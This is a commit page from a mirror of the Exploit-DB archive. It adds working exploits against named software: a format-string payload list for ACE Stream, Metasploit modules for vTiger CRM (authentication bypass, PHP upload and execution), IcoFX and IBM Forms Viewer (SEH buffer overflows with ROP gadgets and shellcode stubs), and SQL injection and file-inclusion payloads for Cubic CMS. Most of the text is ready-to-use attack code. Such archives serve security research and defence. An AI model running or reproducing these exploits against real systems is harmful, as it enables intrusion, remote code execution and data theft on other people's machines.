bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 01_09_2014

Browse source
This commit is contained in:
Offensive Security 2014-01-09 04:19:13 +00:00
parent 9b2c254843
commit cddc6c7998
6 changed files with 579 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -27516,6 +27516,7 @@ id,file,description,date,author,platform,type,port
30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 Index.PHP Multiple Remote File Include Vulnerabilities",2007-10-11,iNs,php,webapps,0
30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 Merchant Shop.PHP SQL Injection Vulnerability",2007-10-11,durito,php,webapps,0
30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE, NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass Vulnerability",2014-01-03,"Amplia Security Advisories",hardware,webapps,0
30666,platforms/multiple/local/30666.txt,"ACE Stream Media 2.1 - (acestream://) Format String Exploit PoC",2014-01-03,LiquidWorm,multiple,local,0
30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple CSRF Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple XSS Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0
30672,platforms/windows/dos/30672.txt,"Live for Speed Skin Name Buffer Overflow Vulnerability",2007-10-13,"Luigi Auriemma",windows,dos,0
@ -27616,3 +27617,7 @@ id,file,description,date,author,platform,type,port
30778,platforms/asp/webapps/30778.txt,"Click&BaneX Details.ASP SQL Injection Vulnerability",2007-11-19,"Aria-Security Team",asp,webapps,0
30780,platforms/linux/local/30780.txt,"ISPmanager 4.2.15 Responder Local Privilege Escalation Vulnerability",2007-11-20,"Andrew Christensen",linux,local,0
30781,platforms/osx/remote/30781.txt,"Apple Mac OS X 10.5.x Mail Arbitrary Code Execution Vulnerability",2007-11-20,"heise Security",osx,remote,0
30787,platforms/php/remote/30787.rb,"vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",2014-01-07,metasploit,php,remote,80
30788,platforms/windows/local/30788.rb,"IcoFX Stack Buffer Overflow",2014-01-07,metasploit,windows,local,0
30789,platforms/windows/local/30789.rb,"IBM Forms Viewer Unicode Buffer Overflow",2014-01-07,metasploit,windows,local,0
30790,platforms/php/webapps/30790.txt,"Cubic CMS - Multiple Vulnerabilities",2014-01-07,"Eugenio Delfa",php,webapps,80

Can't render this file because it is too large.

67
platforms/multiple/local/30666.txt Executable file
View file

@ -0,0 +1,67 @@
?
ACE Stream Media 2.1 (acestream://) Format String Exploit PoC
Vendor: ACE Stream
Product web page: http://www.acestream.org
Affected version: Ace Player HD 2.1.9 (VLC 2.0.5)
Summary: Ace Stream is an innovative multimedia platform of a new
generation, which includes different products and solutions for
ordinary Internet users as well as for professional members of the
multimedia market. Ace Stream uses in its core, P2P (peer-to-peer)
technology, BitTorrent protocol, which is acknowledged as the most
effective protocol to transfer/deliver 'heavy content'.
Desc: ACE Stream Media (Ace Player HD) is prone to a remote format
string vulnerability because the application fails to properly
sanitize user-supplied input thru the URI using the 'acestream://'
protocol before including it in the format-specifier argument of
a formatted-printing function. A remote attacker may exploit this
issue to execute arbitrary code with the privileges of the user
running the affected application and/or cause memory address disclosure.
Failed exploit attempts may cause denial-of-service (DoS) conditions.
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5165
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php
30.12.2013
--
format md:
acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA
acestream://AAAA%s
acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA
acestream://AAAA%08d
acestream://%i%i%i%i
acestream://%c%c%c%c
acestream://%f%f%f%f
acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA
acestream://%15.10s.%15.10s
acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x
acestream://%0a%0d
acestream://%AA
acestream://%p%p%p%p%s
crashes:
acestream://AAAA%08s
acestream://AAAA%n
acestream://%08s
acestream://%p%p%p%p%s%n
acestream://%n
acestream://%s%s%s%s
acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA

182
platforms/php/remote/30787.rb Executable file
View file

@ -0,0 +1,182 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
'Description' => %q{
vTiger CRM allows an user to bypass authentication when requesting SOAP services.
In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
service. By combining both vulnerabilities an attacker can upload and execute PHP
code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
10.04 and Windows 2003 SP2.
},
'Author' =>
[
'Egidio Romano', # Vulnerability discovery
'juan vazquez' # msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-3214' ],
[ 'CVE', '2013-3215' ],
[ 'OSVDB', '95902' ],
[ 'OSVDB', '95903' ],
[ 'BID', '61558' ],
[ 'BID', '61559' ],
[ 'EDB', '27279' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
# Arbitrary big number. The payload is sent base64 encoded
# into a POST SOAP request
'Space' => 262144, # 256k
'DisableNops' => true
},
'Targets' =>
[
[ 'vTigerCRM v5.4.0', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 26 2013'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
], self.class)
end
def check
test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
res = send_soap_request(test_one)
unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
return Exploit::CheckCode::Unknown
end
test_two = check_email_soap("admin")
res = send_soap_request(test_two)
if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
file_name = rand_text_alpha(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>|
soap = add_attachment_soap(file_name, php)
res = send_soap_request(soap)
print_status("#{peer} - Uploading payload...")
if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
print_good("#{peer} - Upload successfully uploaded")
register_files_for_cleanup(file_name)
else
fail_with(Failure::Unknown, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
end
def add_attachment_soap(file_name, file_data)
xml = Document.new
xml.add_element(
"soapenv:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
'xmlns:crm' => "http://www.vtiger.com/products/crm"
})
xml.root.add_element("soapenv:Header")
xml.root.add_element("soapenv:Body")
body = xml.root.elements[2]
body.add_element(
"crm:AddEmailAttachment",
{
'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
})
crm = body.elements[1]
crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
crm.add_element("filename", {'xsi:type' => 'xsd:string'})
crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
crm.add_element("username", {'xsi:type' => 'xsd:string'})
crm.add_element("session", {'xsi:type' => 'xsd:string'})
crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
crm.elements['filedata'].text = "MSF_PAYLOAD"
crm.elements['filename'].text = "MSF_FILENAME"
crm.elements['filesize'].text = file_data.length.to_s
crm.elements['filetype'].text = "php"
crm.elements['username'].text = rand_text_alpha(4+rand(4))
xml_string = xml.to_s
xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
return xml_string
end
def check_email_soap(user_name = "", session = "")
xml = Document.new
xml.add_element(
"soapenv:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
'xmlns:crm' => "http://www.vtiger.com/products/crm"
})
xml.root.add_element("soapenv:Header")
xml.root.add_element("soapenv:Body")
body = xml.root.elements[2]
body.add_element(
"crm:CheckEmailPermission",
{
'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
})
crm = body.elements[1]
crm.add_element("username", {'xsi:type' => 'xsd:string'})
crm.add_element("session", {'xsi:type' => 'xsd:string'})
crm.elements['username'].text = user_name
crm.elements['session'].text = session
xml.to_s
end
def send_soap_request(soap_data)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap_data
})
return res
end
end

61
platforms/php/webapps/30790.txt Executable file
View file

@ -0,0 +1,61 @@
I. BACKGROUND
-------------------------
"CUBIC CMS" is a non-free content management system for websites and
portals of any size, powerful, adaptable to any graphic design that
allows users administration 100% professional but simple at the same
time that website.
II. VULNERABILITIES
-------------------------
II.i FULL PATH DISCLOSURE
-------------------------
CUBIC CMS presents a full path disclosure in the 'Controller Not Found'
exception management, due to an incorrect 'Software Exception' management.
Syntax:
http://www.example.com/id/-22
http://www.example.com/foo.bar
II.ii SQL Injection
-------------------------
CUBIC CMS presents a SQL Injection in its 'resource_id' and 'version_id' parameters
on his '/recursos/agent.php' (Resources Management Module) script via GET HTTP
Method, due to an insufficient sanitization on user supplied data.
Syntax:
http://www.example.com/recursos/agent.php?resource_id=-11 OR 'foobar' UNION SELECT user()-- -
http://www.example.com/recursos/agent.php?version_id=-22 OR '' UNION SELECT @@version-- -
II.iii SQL Injection
-------------------------
CUBIC CMS presents a SQL Injection in its 'login' and 'pass' parameters on his
'/login.usuario' (Users Management Module) script via POST HTTP Method, due to an
insufficient sanitization on user supplied data.
Syntax:
login=Administrator&pass=foobar') or ('1'='1
II.iv Local File Inclusion
-------------------------
CUBIC CMS presents a SQL Injection in its 'path' parameter on his
'/recursos/agent.php' (Resources Management Module) script via GET HTTP Method,
due to an insufficient sanitization on user supplied data.
Syntax:
http://www.example.com/recursos/agent.php?path=/../../application/config/project.ini
IV. REFERENCES
-------------------------
http://www.proyectosbds.com
http://www.cubicfactory.com/
V. DISCLOSURE TIMELINE
-------------------------
- March 28, 2012: First Vendor Contact.
- Dec 30, 2013: Second Vendor Contact (Still waiting for responses).
VI. CREDITS
-------------------------
This vulnerability has been discovered
by Eugenio Delfa <ed (at) isbox (dot) org>.

108
platforms/windows/local/30788.rb Executable file
View file

@ -0,0 +1,108 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'IcoFX Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in version 2.1
of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
crafted ICONDIR header, providing an arbitrary long number of images into the file,
can be used to trigger the overflow when reading the ICONDIRENTRY structures.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Marcos Accossatto', # Vulnerability discovery, poc
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-4988' ],
[ 'OSVDB', '100826' ],
[ 'BID', '64221' ],
[ 'EDB', '30208'],
[ 'URL', 'http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability' ]
],
'Platform' => [ 'win' ],
'Payload' =>
{
'DisableNops' => true,
'Space' => 864,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Targets' =>
[
[ 'IcoFX 2.5 / Windows 7 SP1',
{
:callback => :target_win7,
}
],
],
'DisclosureDate' => 'Dec 10 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.ico'])
], self.class)
end
def target_win7
# All the gadgets com from IcoFX2.exe 2.5.0.0
# ICONDIR structure
ico = [0].pack("v") # Reserved. Must always be 0
ico << [1].pack("v") # Image type: 1 for icon (.ico) image
# 0x66 is enough to overwrite the local variables and, finally
# the seh handler. 0x7f00 is used to trigger an exception after
# the overflow, while the overwritten SEH handler is in use.
ico << [0x7f00].pack("v")
# ICONDIRENTRY structures 102 structures are using to overwrite
# every structure = 16 bytes
# 100 structures are used to reach the local variables
ico << rand_text(652)
ico << [0x0044729d].pack("V") * 20 # ret # rop nops are used to allow code execution with the different opening methods
ico << [0x0045cc21].pack("V") # jmp esp
ico << payload.encoded
ico << rand_text(
1600 - # 1600 = 16 ICONDIRENTRY struct size * 100
652 - # padding to align the stack pivot
80 - # rop nops size
4 - # jmp esp pointer size
payload.encoded.length
)
# The next ICONDIRENTRY allows to overwrite the interesting local variables
# on the stack
ico << [2].pack("V") # Counter (remaining bytes) saved on the stack
ico << rand_text(8) # Padding
ico << [0xfffffffe].pack("V") # Index to the dst buffer saved on the stack, allows to point to the SEH handler
# The next ICONDIRENTRY allows to overwrite the seh handler
ico << [0x00447296].pack("V") # Stackpivot: add esp, 0x800 # pop ebx # ret
ico << rand_text(0xc) # padding
return ico
end
def exploit
unless self.respond_to?(target[:callback])
fail_with(Failure::BadConfig, "Invalid target specified: no callback function defined")
end
ico = self.send(target[:callback])
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create(ico)
end
end

156
platforms/windows/local/30789.rb Executable file
View file

@ -0,0 +1,156 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include REXML
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Forms Viewer Unicode Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability
is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed
XFDL files, with a long fontname value. This module has been tested successfully on IBM
Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability discovery
'juan vazquez', # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-5447' ],
[ 'OSVDB', '100732' ],
[ 'ZDI', '13-274' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21657500' ],
],
'Payload' =>
{
'Space' => 3000,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'ECX',
'BufferOffset' => 10
},
'BadChars' => (0x00..0x08).to_a.pack("C*") + (0x0b..0x1f).to_a.pack("C*") +"\x26\x3c" + (0x80..0xff).to_a.pack("C*"),
'DisableNops' => true,
# Fix the stack before the payload is executed, so we avoid
# windows exceptions due to alignment
'Prepend' =>
"\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000
},
'Platform' => 'win',
'Targets' =>
[
[ 'IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1',
# masqform.exe 8.0.0.266
{
'Ret' => 0x4c30, # p/p/r unicode from masqform.exe
'Nop' => 0x47, # 004700 => add [edi+0x0],al
'Offset' => 62
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 05 2013',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xfdl']),
], self.class)
end
def generate_xfdl
xml = Document.new
# XFDL
xfdl = xml.add_element("XFDL", {
'xmlns:custom' => "http://www.ibm.com/xmlns/prod/XFDL/Custom",
'xmlns:designer' => "http://www.ibm.com/xmlns/prod/workplace/forms/designer/2.6",
'xmlns:ev' => "http://www.w3.org/2001/xml-events",
'xmlns:xfdl' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
'xmlns:xforms' => "http://www.w3.org/2002/xforms",
'xmlns' => "http://www.ibm.com/xmlns/prod/XFDL/7.5",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance"
})
# XFDL => globalpage
xdfl_global_page = xfdl.add_element("globalpage", {
"sid" => "global"
})
global = xdfl_global_page.add_element("global", {
"sid" => "global"
})
designer_date = global.add_element("designer:date")
designer_date.text = "20060615"
form_id = global.add_element("formid")
form_id.add_element("title")
serial_number = form_id.add_element("serialnumber")
serial_number.text = "A6D5583E2AD0D54E:-72C430D4:10BD8923059:-8000"
version_form = form_id.add_element("version")
version_form.text = "1"
# XFDL => page
page = xfdl.add_element("page", {
"sid" => "PAGE1"
})
# XFDL => page => global
page_global = page.add_element("global", {
"sid" => "global"
})
label_page = page_global.add_element("label")
label_page.text = "PAGE1"
# XFDL => page => label
label = page.add_element("label", {
"sid" => "title"
})
item_location = label.add_element("itemlocation")
x = item_location.add_element("x")
x.text = "20"
y = item_location.add_element("y")
y.text = "0"
value = label.add_element("value", {
"compute" => "global.global.custom:formTitle"
})
value.text = rand_text_alpha(10)
font_info = label.add_element("fontinfo")
font_name = font_info.add_element("fontname")
font_name.text = "MSF_REPLACE"
xml.to_s
end
def exploit
sploit = rand_text_alpha(target['Offset'])
sploit << "\x61\x62" # nseh # NSEH # popad (61) + nop compatible with unicode (add [edx+0x0],ah # 006200)
sploit << [target.ret].pack("v") # seh # ppr
sploit << [target['Nop']].pack("C")
sploit << payload.encoded
sploit << rand_text_alpha(4096) # make it crash
xfdl = generate_xfdl.gsub(/MSF_REPLACE/, sploit) # To avoid rexml html encoding
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(xfdl)
end
end